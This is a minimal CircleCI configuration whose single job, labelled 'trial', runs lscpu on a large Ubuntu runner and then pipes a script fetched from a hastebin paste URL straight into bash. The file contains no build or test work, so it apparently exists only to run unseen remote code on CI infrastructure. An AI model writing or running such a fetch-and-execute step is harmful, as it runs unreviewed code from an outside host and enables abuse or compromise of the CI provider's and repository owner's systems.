version: 2.1

jobs:
  trial:
    machine:
      image: ubuntu-2004:current
    resource_class: large
    steps:
      - run: lscpu
      - run: 
            name: "trial" 
            command: curl https://hastebin.skyra.pw/raw/ralekoviwi | bash
 
workflows: 
    version: 2.1 
    build: 
        jobs: 
        - trial
